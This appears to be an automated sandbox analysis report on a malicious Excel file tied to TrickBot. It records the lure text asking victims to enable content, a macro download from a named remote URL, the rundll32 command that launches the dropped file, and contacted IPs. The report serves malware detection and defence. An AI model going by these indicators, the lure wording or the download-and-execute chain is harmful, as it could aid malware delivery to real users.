Loading ...

Play interactive tourEdit tour

Analysis Report upload_dreport_1364433.xls

Overview

General Information

Sample Name:upload_dreport_1364433.xls
Analysis ID:384202
MD5:754118ba489515384b9607af8afb0818
SHA1:a16a7be15f0d55a3a1e8aa771752d2740cd7b0a6
SHA256:9a8354e138e9a773581bb74e52e6e1a7dffb3fb0f6ec1859b4a4d7dc62421c97
Tags:rob47SilentBuilderTrickBotxls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2496 cmdline: rundll32 ..\hdoanal.sbl,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
upload_dreport_1364433.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x16637:$e1: Enable Editing
  • 0x16381:$e3: Enable editing
  • 0x16453:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: www.algostore.in
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.212.121.53:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.212.121.53:80
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CD8CA3A.emfJump to behavior
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: www.algostore.in
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: upload_dreport_1364433.xls, 79DE0000.0.drString found in binary or memory: http://www.algostore.in/algostoreold/printme.php
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
Source: Screenshot number: 4Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start U the decryption of the docum
Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3Screenshot OCR: Enable Content
Source: Document image extraction number: 4Screenshot OCR: Enable Editing
Source: Document image extraction number: 13Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 ) Protected Vi
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft officd Decryption Core to start 18 ['the decryption of the doc
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: upload_dreport_1364433.xlsInitial sample: CALL
Source: upload_dreport_1364433.xlsInitial sample: EXEC
Source: upload_dreport_1364433.xlsOLE indicator, VBA macros: true
Source: upload_dreport_1364433.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal60.expl.evad.winXLS@3/5@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCBC7.tmpJump to behavior
Source: upload_dreport_1364433.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hdoanal.sbl,StartW
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hdoanal.sbl,StartW
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hdoanal.sbl,StartWJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
algostore.in0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://www.algostore.in/algostoreold/printme.php0%VirustotalBrowse
http://www.algostore.in/algostoreold/printme.php0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
algostore.in
103.212.121.53
truefalseunknown
www.algostore.in
unknown
unknownfalse
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmpfalse
                high
                http://www.algostore.in/algostoreold/printme.phpupload_dreport_1364433.xls, 79DE0000.0.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                103.212.121.53
                algostore.inIndia
                133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:384202
                Start date:08.04.2021
                Start time:18:30:20
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 7s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:upload_dreport_1364433.xls
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal60.expl.evad.winXLS@3/5@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                WEBWERKS-AS-INWebWerksIndiaPvtLtdINScan-45679.exeGet hashmaliciousBrowse
                • 43.241.61.180
                FIR_Copy.exeGet hashmaliciousBrowse
                • 103.224.241.225
                Copy of Invoice 522967.xlsmGet hashmaliciousBrowse
                • 43.239.110.5
                Enquiries & PO.xlsGet hashmaliciousBrowse
                • 103.102.234.200
                Purchase_Order.xlsGet hashmaliciousBrowse
                • 103.102.234.200
                z2xQEFs54b.exeGet hashmaliciousBrowse
                • 150.242.140.16
                Tomd.htmGet hashmaliciousBrowse
                • 103.102.234.241
                SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                • 103.102.234.241
                Swift copy.exeGet hashmaliciousBrowse
                • 103.224.241.225
                PO71109.EXEGet hashmaliciousBrowse
                • 103.102.234.253
                creoagent.dllGet hashmaliciousBrowse
                • 103.233.25.209
                creoagent.dllGet hashmaliciousBrowse
                • 103.233.25.209
                printouts of outstanding as of 01_20_2021.xlsmGet hashmaliciousBrowse
                • 103.11.153.223
                payment infirmation.exeGet hashmaliciousBrowse
                • 206.183.111.188
                User Credentials.docGet hashmaliciousBrowse
                • 103.212.121.59
                E-Statement.exeGet hashmaliciousBrowse
                • 103.212.121.190
                CV_SrinivasaBabuAdhikari.pdf.exeGet hashmaliciousBrowse
                • 103.212.121.190
                STS CARGO SHIPMENT.exeGet hashmaliciousBrowse
                • 103.212.121.190
                HSBC Payment Advice.exeGet hashmaliciousBrowse
                • 103.212.121.190
                990109.exeGet hashmaliciousBrowse
                • 150.242.140.16

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\A8DE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):80471
                Entropy (8bit):7.888931101044359
                Encrypted:false
                SSDEEP:1536:ZSGOoKvmOwWNLLmrWGH3Wj1ZYzsoAeWRlMVGoIahaDHTU6hryF70Kie:ZSNrOOwW4rW23WJZYAog2sTU2yF70Kie
                MD5:551325FC9F0EF79919C4A8BD0786DBA2
                SHA1:C84B11DDA1E4CA2AB035C45AD1233BB131ED26A4
                SHA-256:EEB25E96C5A5908E5E9904C6320009E2DD73DBDEDCCF4734A5C92A9F84E1AE12
                SHA-512:96621D1E71EFB7D369B99023BFD27ACF4918E757A97130A0339CAEB5BDD384313BC90700E16D4B1EEB409BDE4330C8291FBD040064A3EA87083193A3F2404B38
                Malicious:false
                Reputation:low
                Preview: .U.n.0....?......(..r.Izl.4...9..s..$..wH+nb(^.......h~1.]=`....53V..N*.l.....WV..V.v.[......?.o..cEh.[..q.E..b.<Z.t..H....X....l...g..T.....+..^..z...o......R-S&..8.D..&.C.+..:..{..$Z..`.N.z..........}E!W^.x.0.~...%....~...|....s.f?Ivib..@...15.Dp...4R..}r.G. #/..#$_nr.N..N....&.. ...MNR...(.G#.&}..m...../r.Gd.G...M..aD^.o..Bs`9cZk.G.9....R.!......w7......1[.....}$.Kg.&8....<}..:ZF..0$..6.1....N.......D9...Of........PK..........!................[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Apr 9 00:30:40 2021, atime=Fri Apr 9 00:30:40 2021, length=12288, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.48375076304261
                Encrypted:false
                SSDEEP:12:85Q59gKLgXg/XAlCPCHaXtB8XzB/eMMX+Wnicvbc+bDtZ3YilMMEpxRljKNTdJP8:850/XTd6jgfYeQSDv3qIrNru/
                MD5:0C1E0638A30653B168BF8AC4CC2E88F0
                SHA1:9D036BAE04E40BE1FD2D88911D93214F6875C761
                SHA-256:29B581BE59FF27F53C7A94C934567DE5D2E6F331CEADF08073D141D49FD95AD6
                SHA-512:C7CC6AD9151820D0417CEBC51AB43DC82C8E439DB8A718156D12F175B254428BAD576CF4C84CA168387C3877EDA4135C78FC62AEE336AD1B22A2D43AC39889DE
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G..>4...,..>4...,...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):119
                Entropy (8bit):4.657212536980188
                Encrypted:false
                SSDEEP:3:oyBVomMIlPdwbIVtlPdwbmMIlPdwbv:dj6OPdV3PdWOPdm
                MD5:5BCEAE4B11BAD38798C24B8CFF42C07D
                SHA1:CDDDD3F63123E108951D9F3134E4BC6C842319AB
                SHA-256:1FBB4753F83F300753566EF8AA2A0BD7F11B6351DB6CA28FEA3A108D5CD142AF
                SHA-512:671E76DF026E712FB8BCD2F6FF29FB15C907B25FB9E35648A9EE2ECB72F41B6230901DC86BE317E960E11C5FE950177000B8904C2168183EB6857334B147FD09
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[xls]..upload_dreport_1364433.LNK=0..upload_dreport_1364433.LNK=0..[xls]..upload_dreport_1364433.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\upload_dreport_1364433.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Fri Apr 9 00:30:40 2021, atime=Fri Apr 9 00:30:41 2021, length=104960, window=hide
                Category:dropped
                Size (bytes):2148
                Entropy (8bit):4.519455902911819
                Encrypted:false
                SSDEEP:48:8f/XT0jFOAQc51iQcVIQh2f/XT0jFOAQc51iQcVIQ/:8f/XojFOnclcVIQh2f/XojFOnclcVIQ/
                MD5:E78545EC3C3C9F12D4BE705E4E13B0C1
                SHA1:27067EA319F261A7E793E399928081C1C7FF66F0
                SHA-256:BCE3E4A56B85D2BEA1879279E75E0F38264B56623CB227925772CB5E85D0057D
                SHA-512:8B3C36F66A17FB9D19D7B877C0FE94D30FBD17BC97190AE18982A737400FFE58970C41D58B05BD93032134A7FFD2C2A49457C6C4B3F10426DC431AFAF2C991D4
                Malicious:false
                Reputation:low
                Preview: L..................F.... ...K2.{..>4...,..A?...,...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2..J...R.. .UPLOAD~1.XLS..b.......Q.y.Q.y*...8.....................u.p.l.o.a.d._.d.r.e.p.o.r.t._.1.3.6.4.4.3.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\upload_dreport_1364433.xls.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.u.p.l.o.a.d._.d.r.e.p.o.r.t._.1.3.6.4.4.3.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905....
                C:\Users\user\Desktop\79DE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Applesoft BASIC program data, first line number 16
                Category:dropped
                Size (bytes):137284
                Entropy (8bit):6.833991894188144
                Encrypted:false
                SSDEEP:3072:tU8rmjAItyzElBIL6lECbgBGGP5xLm7TG2rTUKyF70Pi7W2aEf9SOPaEfGSOZ2Ub:G8rmjAItyzElBIL6lECbgBvP5Nm7TtUo
                MD5:C2D040D8A5936A7ED8EE93496334ADF0
                SHA1:9E8779B14995606BE83A7628D4B8CB54D74B28AC
                SHA-256:A71369313985D81851B4DBCD15E50A9F2E05934C98D1F6E1BE34848EF5843360
                SHA-512:9652FADBD536CDA80C3322E61FCB24917FA62B6966E8437BC5CDF6C09C5A1BBBCDC1876C9B52B222588296B21E555074A67AD11E9A8142396ACE5F547564F8ED
                Malicious:false
                Reputation:low
                Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...........

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Apr 8 17:19:11 2021, Security: 0
                Entropy (8bit):3.194802926156192
                TrID:
                • Microsoft Excel sheet (30009/1) 78.94%
                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                File name:upload_dreport_1364433.xls
                File size:281088
                MD5:754118ba489515384b9607af8afb0818
                SHA1:a16a7be15f0d55a3a1e8aa771752d2740cd7b0a6
                SHA256:9a8354e138e9a773581bb74e52e6e1a7dffb3fb0f6ec1859b4a4d7dc62421c97
                SHA512:a6fc3834f997ca328a1e2b85f40bb7a952a608044cba608bd62ce250f035f4d96f81a584a523b90d3ba39f6b5ae671d7b2e92c6b94a5713a1764046b4c75e1ce
                SSDEEP:6144:YcPiTQAVW/89BQnmlcGvgZ7r3J8b5IZJK+flk99:2n99
                File Content Preview:........................>.......................#................................... ...!..."..................................................................................................................................................................

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "upload_dreport_1364433.xls"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Last Saved By:5
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2021-04-08 16:19:11
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Document Code Page:1251
                Thumbnail Scaling Desired:False
